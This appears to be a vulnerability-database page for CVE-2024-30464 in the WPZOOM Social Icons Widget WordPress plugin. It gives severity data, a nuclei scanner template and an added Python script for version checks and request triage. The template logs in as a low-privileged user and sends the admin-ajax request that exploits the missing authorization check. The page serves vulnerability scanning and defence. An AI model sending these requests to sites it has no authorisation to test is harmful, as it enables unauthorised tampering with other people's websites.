WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
CVE-2024-30464
Verified
Description
WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions; exploitation requires no special conditions.
Severity
Medium
CVSS Score
4.3
Exploit Probability
42%
Affected Product
social-icons-widget-by-wpzoom
Published Date
March 13, 2026
Template Author
pussycat0x
CVE-2024-30464.yaml
id: CVE-2024-30464

info:
  name: WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
  author: pussycat0x
  severity: medium
  description: |
    WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions, exploit requires no special conditions.
  impact: |
    Attackers can perform unauthorized actions, potentially leading to data tampering or privilege escalation.
  remediation: |
    Update to version 4.2.16 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-30464
    epss-score: 0.41698
    epss-percentile: 0.9747
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 4
    vendor: wpzoom
    product: social-icons-widget-by-wpzoom
    framework: wordpress
    publicwww-query: "/plugins/social-icons-widget-by-wpzoom/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,wpzoom,authenticated

variables:
  rand: "{{rand_int(10000, 99999)}}"

flow: http(1) && http(2)

http:
  # Step 1: fingerprint the installed plugin version from readme.txt and gate on <= 4.2.15
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "compare_versions(version, '<= 4.2.15')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  # Step 2: authenticate as a low-privileged user, then call the AJAX action that lacks an authorization check
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=zoom_ajax_set_pointer_transient&transient_name={{rand}}&lifetime=3600

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body,"Done, transient is set") && contains(body,"success\":true")'
        condition: and
# digest: 490a0046304402204b1f184b4612bb45748d67e352d007f03d59c4668cdb1a2448e069a55879a9fe0220011c7f7dba4c77c6c575a3159517aa9cd7dd2e04b94c9832bb276872211c261d:922c64590222798bb761d5b6d8e72950
Score
4.3
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVE ID:
CVE-2024-30464
CWE ID:
CWE-862
Remediation Steps
Update to version 4.2.16 or later.
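The template above makes two decisions: a version gate on the `Stable tag` in readme.txt, and a match on the admin-ajax response body. The following Python is an added example, not part of the nuclei template and not the plugin's own code. It re-implements both decisions so they can be exercised offline, and adds a request-triage rule that flags calls to the `zoom_ajax_set_pointer_transient` action, whether it arrives in a query string or a form body. All sample readme bodies, JSON responses and request records are constructed for the example; the `FIXED_VERSION` value and the `Stable tag` regex are taken from the page.

```python
"""Defender-side checks for CVE-2024-30464 (WPZOOM Social Icons Widget <= 4.2.15).

Added example, not part of the nuclei template and not the plugin's code.
  1. version gate  : read "Stable tag:" from readme.txt and test <= 4.2.15
  2. success signal: the admin-ajax response body the template matches on
  3. triage        : flag requests to /wp-admin/admin-ajax.php whose action is
                     zoom_ajax_set_pointer_transient
All sample inputs below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

AFFECTED_MAX = "4.2.15"      # template: compare_versions(version, '<= 4.2.15')
FIXED_VERSION = "4.2.16"     # from the remediation field
AJAX_ACTION = "zoom_ajax_set_pointer_transient"
STABLE_TAG_RE = re.compile(r"Stable tag: ([0-9.]+)")   # same regex the template uses


def parse_version(text):
    """'4.2.15' -> (4, 2, 15). Tuple comparison gives numeric ordering;
    a plain string comparison would wrongly rank '4.2.15' below '4.2.2'."""
    return tuple(int(part) for part in text.split("."))


def extract_stable_tag(readme_text):
    """Return the 'Stable tag' version string from a readme.txt body, or None."""
    match = STABLE_TAG_RE.search(readme_text)
    return match.group(1) if match else None


def is_affected_version(readme_text):
    """Template step 1: only versions <= 4.2.15 are in scope.
    No tag found is treated as not affected (the template's flow stops too)."""
    tag = extract_stable_tag(readme_text)
    if tag is None:
        return False
    return parse_version(tag) <= parse_version(AFFECTED_MAX)


def ajax_response_indicates_success(body):
    """Template's final matcher: the confirmation message plus the bytes
    success":true (the DSL string "success\\":true" unescapes to that)."""
    return "Done, transient is set" in body and 'success":true' in body


def flag_ajax_request(method, url, form_body=""):
    """Triage rule for one logged request. True when it targets admin-ajax.php
    with the vulnerable action, from the query string (GET) or the form body
    (POST, as the template sends it). Caveat: ordinary access logs do not
    record POST bodies, so this needs a proxy/WAF log that captures form
    fields or a hook on the WordPress side."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    params = parse_qs(parts.query)
    if method.upper() == "POST":
        params.update(parse_qs(form_body))
    return AJAX_ACTION in params.get("action", [])


# --- constructed samples ----------------------------------------------------
SAMPLE_README_OLD = "=== Social Icons Widget & Block by WPZOOM ===\nStable tag: 4.2.15\nRequires PHP: 7.4\n"
SAMPLE_README_FIXED = "=== Social Icons Widget & Block by WPZOOM ===\nStable tag: 4.2.16\n"
SAMPLE_AJAX_OK = '{"success":true,"data":"Done, transient is set"}'
SAMPLE_AJAX_DENIED = '{"success":false,"data":"Invalid nonce"}'   # constructed denial

SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php", "action=zoom_ajax_set_pointer_transient&transient_name=12345&lifetime=3600"),
    ("GET", "/wp-admin/admin-ajax.php?action=zoom_ajax_set_pointer_transient&transient_name=1", ""),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat"),
    ("GET", "/wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt", ""),
]


def triage_samples(requests=SAMPLE_REQUESTS):
    """Return the indexes of the sample requests that the rule flags."""
    return [i for i, (m, u, b) in enumerate(requests) if flag_ajax_request(m, u, b)]


if __name__ == "__main__":
    print("old readme affected:", is_affected_version(SAMPLE_README_OLD))        # True
    print("fixed readme affected:", is_affected_version(SAMPLE_README_FIXED))    # False
    print("success body matched:", ajax_response_indicates_success(SAMPLE_AJAX_OK))  # True
    print("flagged requests:", triage_samples())                                 # [0, 1]
```

The version gate mirrors the template's `compare_versions` call only for dotted numeric tags, which is what the `Stable tag` regex can extract; the triage rule is the part the template does not give you, and its usefulness depends on a log source that records form parameters.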